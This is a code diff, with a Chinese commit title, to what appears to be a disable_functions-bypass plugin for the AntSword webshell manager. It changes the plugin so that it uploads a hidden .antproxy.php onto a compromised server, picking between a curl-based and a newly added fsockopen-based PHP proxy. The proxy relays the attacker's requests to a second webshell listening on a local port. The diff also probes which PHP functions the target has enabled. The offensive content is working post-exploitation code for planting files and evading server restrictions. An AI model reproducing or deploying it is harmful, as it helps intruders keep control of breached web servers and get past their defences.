添加 fsockopen 代理方式

core/base.js

@@ -1,12 +1,15 @@
 'use strict';
 
 const fs = require('fs');
-const {ProxyScript} = require('../payload');
+const {
+  ProxyScript,
+  ProxyScriptFsock
+} = require('../payload');
 const LANG = require('../language'); // 插件语言库
 const LANG_T = antSword['language']['toastr']; // 通用通知提示
 
 class Base {
-/**
+  /**
    * 初始化
    * @param  {Object} cell dhtmlx.cell对象
    * @param  {Object} top  顶层对象
@@ -25,7 +28,8 @@ class Base {
   generateExt(cmd) {
     let self = this;
     let fileBuff = fs.readFileSync(self.ext_path);
-    let start = 0, end = 0;
+    let start = 0,
+      end = 0;
     switch (self.ext_name) {
       case 'ant_x86.so':
         start = 275;
@@ -45,9 +49,9 @@ class Base {
         end = 1691;
         break;
       default:
-      break;
+        break;
     }
-    if(cmd.length > (end - start)) {
+    if (cmd.length > (end - start)) {
       return
     }
     fileBuff[end] = 0;
@@ -57,22 +61,28 @@ class Base {
   }
 
   // 上传代理脚本
-  uploadProxyScript(host="127.0.0.1", port=61111) {
+  uploadProxyScript(host = "127.0.0.1", port = 61111) {
     const PROXY_LANG = LANG['core']['base']['proxyscript'];
     let self = this;
+    let proxycontent = "";
+    if (self.top.infodata.funcs.hasOwnProperty['curl_init'] && self.top.infodata.funcs['curl_init'] == 1) {
+      proxycontent = ProxyScript(`http://${host}:${port}/${self.top.infodata.shell_name}`);
+    } else {
+      proxycontent = ProxyScriptFsock(host, port, `/${self.top.infodata.shell_name}`);
+    }
     self.top.core.request(
       self.top.core.filemanager.create_file({
         path: `${self.top.infodata.phpself}/.antproxy.php`,
-        content: ProxyScript(`http://${host}:${port}/${self.top.infodata.shell_name}`),
+        content: proxycontent,
       })
-    ).then((res)=>{
+    ).then((res) => {
       let ret = res['text'];
       if (ret === '1') {
         toastr.success(PROXY_LANG['success'](`${self.top.infodata.phpself}/.antproxy.php`), LANG_T['success']);
-      }else{
+      } else {
         toastr.error(PROXY_LANG['fail'], LANG_T['error']);
       }
-    }).catch((err)=>{
+    }).catch((err) => {
       toastr.error(`${LANG['error']}: ${JSON.stringify(err)}`, LANG_T['error']);
     });
   }

core/ld_preload/index.js

@@ -179,6 +179,7 @@ class LD_PRELOAD extends Base {
           var ret = response['text'];
           if (ret === '1') {
             toastr.success(LANG['success'], LANG_T['success']);
+            self.form.setItemLabel('status_msg', `127.0.0.1:${port}`);
             self.uploadProxyScript("127.0.0.1", port);
             self.cell.progressOff();
           } else {

payload.js

@@ -331,7 +331,7 @@ module.exports = {
                 $rt["open_basedir"][$rp] = (is_writable($rp)?1:0);
             }
         }
-        $func_arr = array("dl","putenv","error_reporting","error_log","file_put_contents","file_get_contents","fopen","fclose","fwrite","tempnam","imap_open","symlink");
+        $func_arr = array("dl", "putenv", "error_reporting", "error_log", "file_put_contents", "file_get_contents", "fopen", "fclose", "fwrite", "tempnam", "imap_open", "symlink", "curl_init", "fsockopen");
         foreach ($func_arr as $f) {
             $rt["funcs"][$f] = (function_exists($f)?1:0);
         }
@@ -406,5 +406,81 @@ module.exports = {
         }
         curl_close($aAccess);
         echo $sResponse;`;
+    },
+    ProxyScriptFsock: (host, port, url) => {
+        return `<?php
+function get_client_header(){
+    $headers=array();
+    foreach($_SERVER as $k=>$v){
+        if(strpos($k,'HTTP_')===0){
+            $k=strtolower(preg_replace('/^HTTP/', '', $k));
+            $k=preg_replace_callback('/_\\w/','header_callback',$k);
+            $k=preg_replace('/^_/','',$k);
+            $k=str_replace('_','-',$k);
+            if($k=='Host') continue;
+            $headers[]="$k:$v";
+        }
+    }
+    return $headers;
+}
+function header_callback($str){
+    return strtoupper($str[0]);
+}
+function parseHeader($sResponse){
+    list($headerstr,$sResponse)=explode("\r\n\r\n",$sResponse, 2);
+    $ret=array($headerstr,$sResponse);
+    if(preg_match('/^HTTP\/1\.1 \d{3}/', $sResponse)){
+        $ret=parseHeader($sResponse);
+    }
+    return $ret;
+}
+
+set_time_limit(120);
+$headers=get_client_header();
+$host = "${host}";
+$port = ${port};
+$errno = '';
+$errstr = '';
+$timeout = 30;
+$url = "${url}";
+
+if (!empty($_SERVER['QUERY_STRING'])){
+    $url .= "?".$_SERVER['QUERY_STRING'];
+};
+
+$fp = fsockopen($host, $port, $errno, $errstr, $timeout);
+if(!$fp){
+    return false;
+}
+
+$method = "GET";
+$post_data = "";
+if($_SERVER['REQUEST_METHOD']=='POST') {
+    $method = "POST";
+    $post_data = file_get_contents('php://input');
+}
+
+$out = $method." ".$url." HTTP/1.1\\r\\n";
+$out .= "Host: ".$host.":".$port."\\r\\n";
+if (!empty($_SERVER['CONTENT_TYPE'])) {
+    $out .= "Content-Type: ".$_SERVER['CONTENT_TYPE']."\\r\\n";
+}
+$out .= "Content-length:".strlen($post_data)."\\r\\n";
+
+$out .= implode("\\r\\n",$headers);
+$out .= "\\r\\n\\r\\n";
+$out .= "".$post_data;
+
+fputs($fp, $out);
+
+$response = '';
+while($row=fread($fp, 4096)){
+    $response .= $row;
+}
+fclose($fp);
+$pos = strpos($response, "\\r\\n\\r\\n");
+$response = substr($response, $pos+4);
+echo $response;
+`;
     }
 }